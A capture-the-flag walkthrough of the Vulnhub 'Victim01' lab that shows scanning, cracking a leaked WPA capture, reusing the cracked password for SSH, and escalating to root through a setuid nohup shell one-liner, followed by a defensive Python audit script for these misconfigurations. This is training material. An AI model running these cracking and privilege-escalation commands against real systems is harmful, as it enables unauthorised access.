Victim 01
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0c:40:47 1 60 PCS Systemtechnik GmbH
192.168.56.156 08:00:27:80:d1:6f 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address was identified as 192.168.56.156.
Nmap scan
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 21:39 EST
Nmap scan report for bogon (192.168.56.156)
Host is up (0.00038s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
| 256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_ 256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open http WebFS httpd 1.21
|_http-title: 0.0.0.0:8999/
|_http-server-header: webfs/1.21
9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:80:D1:6F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.60 seconds
Apart from port 22, which runs SSH, the remaining open ports 80, 8080, 8999 and 9000 all run HTTP services, so the enumeration that follows focuses on the HTTP services.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156
No configuration file found and no installation code available. Exiting...
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/robots.txt
User-agent: *
Disallow: h@ck3rz!
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/h@ck3rz!
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.156 Port 80</address>
</body></html>
/robots.txt reveals a directory, yet it cannot be accessed. Strange! Could this be a rabbit hole?
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156/h@ck3rz!
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 21:48:57 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220014 / 220561 (99.75%)===============================================================
2022/11/12 21:51:42 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
zsh: event not found: /
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
zsh: event not found: /
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156/h@ck3rz!
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,sh,txt,html
[+] Timeout: 10s
===============================================================
2022/11/12 21:53:02 Starting gobuster in directory enumeration mode
===============================================================
Progress: 460170 / 1102805 (41.73%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/12 21:58:49 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 12 21:58:54 2022
URL_BASE: http://192.168.56.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Entering directory: http://192.168.56.156/images/ ----
+ http://192.168.56.156/images/.config (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/_vti_bin/shtml.dll (CODE:403|SIZE:279)
+ http://192.168.56.156/images/awstats.conf (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.156/images/banners/
+ http://192.168.56.156/images/development.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/global.asa (CODE:403|SIZE:279)
+ http://192.168.56.156/images/global.asax (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.156/images/headers/
+ http://192.168.56.156/images/index.html (CODE:200|SIZE:31)
+ http://192.168.56.156/images/main.mdb (CODE:403|SIZE:279)
+ http://192.168.56.156/images/php.ini (CODE:403|SIZE:279)
+ http://192.168.56.156/images/production.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/spamlog.log (CODE:403|SIZE:279)
+ http://192.168.56.156/images/thumbs.db (CODE:403|SIZE:279)
+ http://192.168.56.156/images/Thumbs.db (CODE:403|SIZE:279)
+ http://192.168.56.156/images/WS_FTP.LOG (CODE:403|SIZE:279)
^C> Testing: http://192.168.56.156/includes/references
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156/h@ck3rz!
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 12 21:59:35 2022
URL_BASE: http://192.168.56.156/h@ck3rz!/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.156/h@ck3rz!/ ----
+ http://192.168.56.156/h@ck3rz!/.config (CODE:403|SIZE:279)
-----------------
END_TIME: Sat Nov 12 21:59:39 2022
DOWNLOADED: 4612 - FOUND: 1
Information gathering on port 80 did not yield much, although I'm not quite ready to give up on it, haha.
Next, let's look at port 8080:
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.156:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 22:03:17 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220545 / 220561 (99.99%)===============================================================
2022/11/12 22:04:54 Finished
===============================================================
Port 8080 did not expose any usable attack surface either.
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156:8999/
<head><title>0.0.0.0:8999/</title></head>
<body bgcolor=white text=black link=darkblue vlink=firebrick alink=red>
<h1>listing:
<a href="/">/</a></h1><hr noshade size=1><pre>
<b>access user group date size name</b>
drwxr-xr-x nobody nogroup Apr 07 2020 <DIR> <a href="wordpress/">wordpress</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-admin/">wp-admin</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-content/">wp-content</a>
drwxr-xr-x nobody nogroup Mar 31 2020 <DIR> <a href="wp-includes/">wp-includes</a>
-rw-r--r-- root root Apr 07 2020 197 kB <a href="WPA-01.cap">WPA-01.cap</a>
-rw-r--r-- nobody nogroup Feb 06 2020 405 B <a href="index.php">index.php</a>
-rw-r--r-- nobody nogroup Feb 12 2020 19 kB <a href="license.txt">license.txt</a>
-rw-r--r-- nobody nogroup Jan 10 2020 7278 B <a href="readme.html">readme.html</a>
-rw-r--r-- nobody nogroup Feb 06 2020 6912 B <a href="wp-activate.php">wp-activate.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 351 B <a href="wp-blog-header.php">wp-blog-header.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2275 B <a href="wp-comments-post.php">wp-comments-post.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2913 B <a href="wp-config-sample.php">wp-config-sample.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3940 B <a href="wp-cron.php">wp-cron.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 2496 B <a href="wp-links-opml.php">wp-links-opml.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3300 B <a href="wp-load.php">wp-load.php</a>
-rw-r--r-- nobody nogroup Feb 10 2020 46 kB <a href="wp-login.php">wp-login.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 8501 B <a href="wp-mail.php">wp-mail.php</a>
-rw-r--r-- nobody nogroup Feb 10 2020 18 kB <a href="wp-settings.php">wp-settings.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 30 kB <a href="wp-signup.php">wp-signup.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 4755 B <a href="wp-trackback.php">wp-trackback.php</a>
-rw-r--r-- nobody nogroup Feb 06 2020 3133 B <a href="xmlrpc.php">xmlrpc.php</a>
</pre><hr noshade size=1>
<small><a href="http://bytesex.org/webfs.html">webfs/1.21</a> 13/Nov/2022 02:41:04 GMT</small>
</body>
After looking through the main files, one of them, WPA-01.cap, stands out. Let's see whether it can be downloaded locally
and whether the wireless Wi-Fi password in that capture can be cracked.
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap
Aircrack-ng 1.6
[00:00:13] 71018/14344392 keys tested (5391.78 k/s)
Time left: 44 minutes, 7 seconds 0.50%
KEY FOUND! [ p4ssword ]
Master Key : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD
50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A
Transient Key : 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64 D3 77 A7
E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26 06 0C 98
8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15 3A 3A 11
6C 28 C0 E1 30 92 1B 84 A5 C5 67 3A 47 01 B4 1C
EAPOL HMAC : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9
Cracking succeeded; the Wi-Fi password is p4ssword.
Perhaps the SSID and this password are also the SSH username and password.
dlink@victim01:/usr/bin$ sudo -l
User dlink may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/TryHarder!
Privilege escalation
User dlink can run /usr/bin/TryHarder! without a password,
but that file does not exist on the target host. Creating it ourselves was attempted and failed for lack of permission to create a file at that path, so another approach is needed.
dlink@victim01:/usr/bin$ find / -type f -perm /4000 2>/dev/null
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/nohup
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/arping
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/bin/mount
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
dlink@victim01:/usr/bin$ /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
/usr/bin/nohup: ignoring input and appending output to 'nohup.out'
# id
uid=1002(dlink) gid=1004(dlink) euid=0(root) groups=1004(dlink)
# cd /root
# ls -alh
total 68K
drwx------ 7 root root 4.0K Apr 7 2020 .
drwxr-xr-x 23 root root 4.0K Apr 7 2020 ..
lrwxrwxrwx 1 root root 9 Aug 2 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Apr 7 2020 .cache
drwx------ 3 root root 4.0K Aug 2 2019 .gnupg
-rw------- 1 root root 49 Apr 7 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Apr 7 2020 .local
-rw------- 1 root root 0 Apr 7 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 7 Apr 7 2020 .python_history
-rw-r--r-- 1 root root 66 Apr 7 2020 .selected_editor
drwx------ 2 root root 4.0K Apr 7 2020 .ssh
-rw------- 1 root root 8.1K Aug 3 2019 .viminfo
-rw-r--r-- 1 root root 207 Apr 7 2020 .wget-hsts
-rw-r--r-- 1 root root 556 Apr 7 2020 flag.txt
drwxr-xr-x 3 root root 4.0K Apr 7 2020 snap
# cat flag.txt
Nice work!
.:##:::.
.:::::/;;\:.
()::::::@::/;;#;|:.
::::##::::|;;##;|::
':::::::::\;;;/::'
':::::::::::
|O|O|O|O|O|O
:#:::::::##::.
.:###:::::#:::::.
:::##:::::::::::#:.
::::;:::::::::###::.
':::;::###::;::#:::::
::::;::#::;::::::::::
:##:;::::::;::::###::: .
.:::::; .:::##::::::::::::::::
::::::; :::::::::::::::::##:: #rootdance
#
Privilege escalation successful!
The main path through this box is cracking the captured wireless traffic to obtain the SSID and password, and then assuming that this SSID and password double as the system's username and password!
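As an added defender-side check (not code from the original write-up), the following Python audits the two host misconfigurations this box turns on: a setuid bit on a binary that is not setuid on a stock install (nohup) and a sudoers NOPASSWD rule pointing at a path that does not exist. The STOCK_SUID allowlist, the SAMPLE_* inputs and the injected path_exists callback are assumptions constructed from this page's own transcripts.

```python
import shlex

# Assumed allowlist: setuid programs on a stock Ubuntu 18.04 install, built here
# from the page's `find` listing minus the anomaly.  On a real host derive it
# from a known-good image, never from the host being audited.
STOCK_SUID = {
    "/usr/sbin/pppd", "/usr/bin/pkexec", "/usr/bin/newuidmap", "/usr/bin/chfn",
    "/usr/bin/newgidmap", "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/traceroute6.iputils", "/usr/bin/at", "/usr/bin/passwd",
    "/usr/bin/gpasswd", "/usr/bin/arping", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/snapd/snap-confine",
    "/bin/mount", "/bin/su", "/bin/umount", "/bin/ping", "/bin/fusermount",
}

def unexpected_suid(find_output, allowlist=STOCK_SUID):
    """Paths from `find / -type f -perm /4000` output that are not allowlisted."""
    paths = (ln.strip() for ln in find_output.splitlines())
    return sorted(p for p in paths if p and p not in allowlist)

def dangling_sudo_rules(sudo_l_output, path_exists):
    """Command paths in `sudo -l` output for which path_exists(path) is False.
    A missing target is latent risk: whoever can later create that path gets the
    rule's privileges.  path_exists is injected so this runs offline (use os.path.exists live)."""
    dangling = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        if not line.startswith("("):
            continue                        # "User ... may run ..." header
        spec = line.split(")", 1)[1]        # drop the "(runas)" prefix
        for entry in spec.split(","):       # a rule may list several commands
            tokens = [t for t in shlex.split(entry) if not t.endswith(":")]
            if tokens and tokens[0].startswith("/") and not path_exists(tokens[0]):
                dangling.append(tokens[0])
    return dangling

# Constructed samples, taken from the transcripts on this page.
SAMPLE_FIND = "/usr/bin/pkexec\n/usr/bin/sudo\n/usr/bin/nohup\n/bin/su\n"
SAMPLE_SUDO_L = ("User dlink may run the following commands on localhost:\n"
                 "    (ALL) NOPASSWD: /usr/bin/TryHarder!\n")
SAMPLE_FS = {"/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/nohup", "/bin/su"}

if __name__ == "__main__":
    print("unexpected setuid:", unexpected_suid(SAMPLE_FIND))
    print("dangling sudo rules:", dangling_sudo_rules(SAMPLE_SUDO_L, SAMPLE_FS.__contains__))
```

Run on a live host, feed it the real `find` and `sudo -l` output and pass os.path.exists; nohup appearing in the first list and TryHarder! in the second are exactly the two findings the walkthrough exploited.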
From: https://www.cnblogs.com/jason-huawen/p/16885666.html